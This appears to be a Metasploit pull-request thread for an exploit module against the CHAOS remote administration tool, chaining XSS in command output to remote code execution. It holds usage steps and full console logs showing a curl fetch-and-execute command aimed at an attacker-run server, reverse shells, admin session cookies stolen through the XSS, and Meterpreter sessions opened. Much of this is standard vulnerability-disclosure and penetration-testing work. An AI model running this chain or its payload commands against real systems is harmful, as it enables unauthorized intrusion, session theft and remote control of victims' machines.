CHAOS rat xss to rce

[h00die]

CHAOS v5.0.8 is a free and open-source Remote Administration Tool that
allow generate binaries to control remote operating systems. The
webapp contains a remote command execution vulnerability which
can be triggered by an authenticated user when generating a new
executable. The webapp also contains an XSS vulnerability within
the view of a returned command being executed on an agent.

Execution can happen through one of three routes:

1. Provided credentials can be used to execute the RCE directly
2. A JWT token from an agent can be provided to emulate a compromised
   host. If a logged in user attempts to execute a command on the host
   the returned value contains an xss payload.
3. Similar to technique 2, an agent executable can be provided and the
   JWT token can be extracted.

Verified against CHAOS 7d5b20ad7e58e5b525abdcb3a12514b88e87cef2 running
in a docker container.

Verification

1. Install the application or run the docker image
2. Start msfconsole
3. Do: use exploit/linux/http/chaos_rat_xss_to_rce
4. Do: set rhost [ip]
5. Pick a method:
6. set username [username], set password [password]
7. set jwt [jwt token]
8. set agent [path to agent]
9. Do: run
10. You should get a shell. Interaction by a CHAOS admin may be required

[h00die]

@chebuya wanted to bring this to your attention since you discovered it

[jheysel-r7]

This module is in the modules/exploit/linux folder - can this be exploited on Windows as well?

[h00die]

in theory you likely could run this software on windows, its written in golang. The install instructions only mention linux, and the docker image is linux (not surprising), so I think Windows installs are minimal if existent at all.

However, this specific option is for when the admin is building a new payload to run on a victim. The option here actually makes no difference, I just opted for 1 since its the default.

[jheysel-r7]

This could probably be handled the HTTPServer mixin. Also, the HTML mixin can return a webpage if needed.

[h00die]

Normally that's how I would handle it, however the direct login method doesn't need an HTTP server, so I wanted to avoid launching it if it wasn't needed. I thought this would be the more efficient route to avoid some kind of potential HTTP server error when it launches (bad ip, port used, etc)) when it wasn't required anyways.

[cgranleese-r7]

Tested and seems to be working as intended 👍

Happy to land once the rest of the feedback is resolved.

Credential method

msf6 exploit(linux/http/chaos_rat_xss_to_rce) > exploit

[*] Command to run on remote host: curl -so ./oYcqobeBZTuJ http://<ip>:9090/Odyz7kVKF-TYi8-49qC08A; chmod +x ./oYcqobeBZTuJ; ./oYcqobeBZTuJ &
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Fetch handler listening on <ip>:9090
[*] HTTP server started
[*] Adding resource /Odyz7kVKF-TYi8-49qC08A
[*] Started reverse TCP handler on <ip>:4444
msf6 exploit(linux/http/chaos_rat_xss_to_rce) > [*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Chaos application found
[*] Attempting exploitation through direct login
[*] Attempting login
[*] Client <ip> requested /Odyz7kVKF-TYi8-49qC08A
[*] Sending payload to <ip> (curl/7.74.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to <ip>
[*] Meterpreter session 1 opened (<ip>:4444 -> <ip>:47768) at 2024-05-08 10:23:11 +0100

Agent method

msf6 exploit(linux/http/chaos_rat_xss_to_rce) > exploit

[*] Command to run on remote host: curl -so ./IyktmtoLxSkl http://<ip>:9090/7PTrmgXiZtm7zaMXvFhTIQ; chmod +x ./IyktmtoLxSkl; ./IyktmtoLxSkl &
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Fetch handler listening on <ip>:9090
[*] HTTP server started
[*] Adding resource /7PTrmgXiZtm7zaMXvFhTIQ
[*] Started reverse TCP handler on <ip>:4444
msf6 exploit(linux/http/chaos_rat_xss_to_rce) > [*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Chaos application found
[*] Attempting exploitation through Agent
[*] Server address: 172.17.0.2
[*] Server port: 8080
[*] Server JWT Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3NDY2OTMwMDAsInVzZXIiOiJkZWZhdWx0In0.E_TQ2pqNzZgRw5syoX_aXFjarI3CNvgP7DcVzLYVPu4
[*] Fake MAC for agent: b5:51:a0:d9:ee:f1
[*] Listening for XSS response on: http://<ip>:8888/
[*] Performing Callback Checkin
[*] WebSocket connecting to receive commands
[*] Performing Callback Checkin
[+] Received agent command 'whoami', sending XSS in return
[*] Received GET request.
[+] Received cookie: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MTUxNjc5MzUsIm9yaWdfaWF0IjoxNzE1MTY0MzM1LCJ1c2VyIjoiYWRtaW4ifQ.de-YBhkfbxKv7l25kw_oo6AELR6_U1nf2VD6JtWzBz4
[+] Detected Agents
Live Agents
===========

 IP            OS       Username                       Hostname  MAC
 --            --       --------                       --------  ---
 <ip>  Windows  Administrator (Administrator)  DC01      b5:51:a0:d9:ee:f1

[*] Client <ip> requested /7PTrmgXiZtm7zaMXvFhTIQ
[*] Sending payload to <ip> (curl/7.74.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to <ip>
[*] Meterpreter session 1 opened (<ip>:4444 -> <ip>:61669) at 2024-05-08 11:32:31 +0100

JWT method

msf6 exploit(linux/http/chaos_rat_xss_to_rce) > [!] The service is running, but could not be validated. Chaos application found
[*] Attempting exploitation through JWT token
[*] Fake MAC for agent: fe:9a:14:40:91:66
[*] Listening for XSS response on: http://<ip>:8888/
[*] Performing Callback Checkin
[*] WebSocket connecting to receive commands
[*] Performing Callback Checkin
[+] Received agent command 'whoami', sending XSS in return
[*] Received GET request.
[+] Received cookie: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MTUxNjg1MDgsIm9yaWdfaWF0IjoxNzE1MTY0OTA4LCJ1c2VyIjoiYWRtaW4ifQ.8MjwkzGcIT0QatzRf6kMLMihBTdKyFQb1mrzGfJj9Ho
[+] Detected Agents
Live Agents
===========

 IP            OS       Username                       Hostname  MAC
 --            --       --------                       --------  ---
 <ip>  Windows  Administrator (Administrator)  DC01      a8:ae:8a:9e:e0:11
 <ip>  Windows  Administrator (Administrator)  DC01      fe:9a:14:40:91:66

[*] Client <ip> requested /Odyz7kVKF-TYi8-49qC08A
[*] Sending payload to <ip> (curl/7.74.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to <ip>
[*] Meterpreter session 2 opened (<ip>:4444 -> <ip>:33236) at 2024-05-08 11:46:05 +0100

[cgranleese-r7]

Release Notes

Adds an exploit for HAOS v5.0.8, which contains a remote command execution vulnerability which
can be triggered through one of three routes: credentials, JWT token from an agent, an agent executable can be provided and the JWT token can be extracted.